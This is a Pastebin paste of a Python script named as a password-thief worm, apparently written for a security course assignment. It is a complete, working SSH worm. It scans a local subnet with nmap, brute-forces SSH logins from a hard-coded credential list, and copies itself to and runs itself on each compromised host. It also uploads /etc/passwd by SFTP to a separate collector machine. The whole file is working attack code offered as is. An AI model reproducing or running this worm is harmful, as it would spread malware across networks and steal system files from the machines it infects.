aaron999

Passwordtheif_worm.py

Jan 30th, 2018
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 8.21 KB | None | 0 0
  1. import paramiko
  2. import sys
  3. import socket
  4. import nmap
  5. import os
  6. import sys
  7. import struct
  8. import fcntl
  9. import netifaces
  10.  
  11. # The list of credentials to attempt
  12. credList = [
  13. ('hello', 'world'),
  14. ('hello1', 'world'),
  15. ('root', '#Gig#'),
  16. ('cpsc', 'cpsc'),
  17. ('ubuntu', '123456')
  18. ]
  19.  
  20. # The file marking whether the worm should spread
  21. INFECTED_MARKER_FILE = "/tmp/infected.txt"
  22. SENDIP  = "192.168.1.6"
  23. ##################################################################
  24. # Returns whether the worm should spread
  25. # @return - True if the infection succeeded and false otherwise
  26. ##################################################################
  27. def isInfectedSystem(ssh):
  28.     # Check if the system as infected. One
  29.     # approach is to check for a file called
  30.     # infected.txt in directory /tmp (which
  31.     # you created when you marked the system
  32.     # as infected).
  33.     try:
  34.         sftpClient = ssh.open_sftp()
  35.         sftpClient.stat(INFECTED_MARKER_FILE)
  36.         return True
  37.     except:
  38.         return False   
  39.  
  40. #################################################################
  41. # Marks the system as infected
  42. #################################################################
  43. def markInfected():
  44.    
  45.     # Mark the system as infected. One way to do
  46.     # this is to create a file called infected.txt
  47.     # in directory /tmp/
  48.     file_obj = open(INFECTED_MARKER_FILE, "w")
  49.     file_obj.write("Has anyone really been far as decided to use even go want to do more like?")
  50.     file_obj.close()
  51. ###############################################################
  52. # Spread to the other system and execute
  53. # @param sshClient - the instance of the SSH client connected
  54. # to the victim system
  55. ###############################################################
  56. def spreadAndExecute(sshClient):
  57.    
  58.     # This function takes as a parameter
  59.     # an instance of the SSH class which
  60.     # was properly initialized and connected
  61.     # to the victim system. The worm will
  62.     # copy itself to remote system, change
  63.     # its permissions to executable, and
  64.     # execute itself. Please check out the
  65.     # code we used for an in-class exercise.
  66.     # The code which goes into this function
  67.     # is very similar to that code.
  68.     wormLoc = "/tmp/passwordthief_worm.py" 
  69.     if len(sys.argv) >= 2:
  70.         if sys.argv[1] == "--host":
  71.             wormLoc = "passwordthief_worm.py"
  72.     sftpClient = sshClient.open_sftp()
  73.     sftpClient.put(wormLoc, "/tmp/passwordthief_worm.py")
  74.     sshClient.exec_command("chmod a+x /tmp/passwordthief_worm.py")
  75.     sshClient.exec_command("nohup python /tmp/passwordthief_worm.py &")
  76.    
  77.  
  78.  
  79. ############################################################
  80. # Try to connect to the given host given the existing
  81. # credentials
  82. # @param host - the host system domain or IP
  83. # @param userName - the user name
  84. # @param password - the password
  85. # @param sshClient - the SSH client
  86. # return - 0 = success, 1 = probably wrong credentials, and
  87. # 3 = probably the server is down or is not running SSH
  88. ###########################################################
  89. def tryCredentials(host, userName, _password, sshClient):
  90.    
  91.     # Tries to connect to host host using
  92.     # the username stored in variable userName
  93.     # and password stored in variable password
  94.     # and instance of SSH class sshClient.
  95.     # If the server is down or has some other
  96.     # problem, connect() function which you will
  97.     # be using will throw socket.error exception.        # Otherwise, if the credentials are not
  98.     # correct, it will throw
  99.     # paramiko.SSHException exception.
  100.     # Otherwise, it opens a connection
  101.     # to the victim system; sshClient now
  102.     # represents an SSH connection to the
  103.     # victim. Most of the code here will
  104.     # be almost identical to what we did
  105.     # during class exercise. Please make
  106.     # sure you return the values as specified
  107.     # in the comments above the function
  108.     # declaration (if you choose to use
  109.     # this skeleton).
  110.     try:
  111.         sshClient.connect(host, username=userName, password=_password)
  112.         return 0
  113.     except paramiko.ssh_exception.AuthenticationException:
  114.         return 1
  115.     except socket.error:
  116.         return 3
  117.        
  118.  
  119. ###############################################################
  120. # Wages a dictionary attack against the host
  121. # @param host - the host to attack
  122. # @return - the instace of the SSH paramiko class and the
  123. # credentials that work in a tuple (ssh, username, password).
  124. # If the attack failed, returns a NULL
  125. ###############################################################
  126. def attackSystem(host):
  127.    
  128.     # The credential list
  129.     global credList
  130.    
  131.     # Create an instance of the SSH client
  132.     ssh = paramiko.SSHClient()
  133.  
  134.     # Set some parameters to make things easier.
  135.     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  136.    
  137.                
  138.     # Go through the credential
  139.     for (username, password) in credList:
  140.        
  141.         # TODO: here you will need to
  142.         # call the tryCredentials function
  143.         # to try to connect to the
  144.         # remote system using the above
  145.         # credentials.  If tryCredentials
  146.         # returns 0 then we know we have
  147.         # successfully compromised the
  148.         # victim. In this case we will
  149.         # return a tuple containing an
  150.         # instance of the SSH connection
  151.         # to the remote system.
  152.         if tryCredentials(host, username, password, ssh) == 0:
  153.             print "Success with " + host + " " +  username + " " + password
  154.             return (ssh, username, password)
  155.         elif tryCredentials(host, username, password, ssh) == 1:
  156.             print "Wrong Credentials on host " + host
  157.             continue
  158.         elif tryCredentials(host, username, password, ssh) == 3:
  159.             print "No SSH client on " + host
  160.             break #no ssh client so just stop
  161.     # Could not find working credentials
  162.     return None
  163.  
  164. ####################################################
  165. # Returns the IP of the current system
  166. # @param interface - the interface whose IP we would
  167. # like to know
  168. # @return - The UP address of the current system
  169. ####################################################
  170. def getMyIP(interface):
  171.     # TODO: Change this to retrieve and
  172.     # return the IP of the current system.
  173.         # Open the socket
  174.  
  175.         # Get all the network interfaces on the system
  176.         networkInterfaces = netifaces.interfaces()
  177.  
  178.         # The IP address
  179.         ipAddr = None
  180.  
  181.         # Go through all the interfaces
  182.         for netFace in networkInterfaces:
  183.  
  184.                 # The IP address of the interface
  185.                 addr = netifaces.ifaddresses(netFace)[2][0]['addr']
  186.  
  187.                 # Get the IP address
  188.                 if not addr == "127.0.0.1":
  189.  
  190.                         # Save the IP addrss and break
  191.                         ipAddr = addr
  192.                         break
  193.  
  194.         return ipAddr
  195.  
  196.  
  197. def getSendPass():
  198.     ssh=paramiko.SSHClient()
  199.     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  200.     ssh.connect(SENDIP, username='ubuntu', password='123456')
  201.     sftpClient = ssh.open_sftp()
  202.     getIP = getMyIP(b"etho0")
  203.     sftpClient.put("/etc/passwd", "sshpasses/passwd"+str(getIP) + ".txt")  
  204.                                                              
  205.  
  206. #######################################################
  207. # Returns the list of systems on the same network
  208. # @return - a list of IP addresses on the same network
  209. #######################################################
  210. def getHostsOnTheSameNetwork():
  211.    
  212.     # TODO: Add code for scanning
  213.     # for hosts on the same network
  214.     # and return the list of discovered
  215.     # IP addresses.
  216.     portScanner = nmap.PortScanner()
  217.     portScanner.scan('192.168.1.0/24', arguments='-p -22 --open')
  218.     hostInfo = portScanner.all_hosts();
  219.     liveHosts = []
  220.     ip_add = getMyIP(b"eth0")
  221.     for host in hostInfo:
  222.         if portScanner[host].state() == "up" and host != ip_add:
  223.             liveHosts.append(host)
  224.  
  225.     return liveHosts
  226.  
  227. # Get the hosts on the same network
  228. networkHosts = getHostsOnTheSameNetwork()
  229. #print "Found hosts: ", networkHosts
  230. if not os.path.exists(INFECTED_MARKER_FILE):
  231.     markInfected()
  232. else:
  233.     print "Already Infected"
  234.     sys.exit()
  235.  
  236. if len(sys.argv) >=2:
  237.     print "Dont get our own passes"
  238. else:
  239.     getSendPass()
  240.  
  241. # Go through the network hosts
  242. for host in networkHosts:
  243.    
  244.     # Try to attack this host
  245.     sshInfo =  attackSystem(host)
  246.    
  247.     print sshInfo
  248.    
  249.    
  250.     # Did the attack succeed?
  251.     if sshInfo:
  252.        
  253.         print "Trying to spread"
  254.         if isInfectedSystem(sshInfo[0]) == True:
  255.             print "Remote System is Infected"
  256.             continue
  257.         else:
  258.             spreadAndExecute(sshInfo[0])
  259.             print "Spreading complete on " + host  
  260.             sys.exit()
Add Comment
Please, Sign In to add comment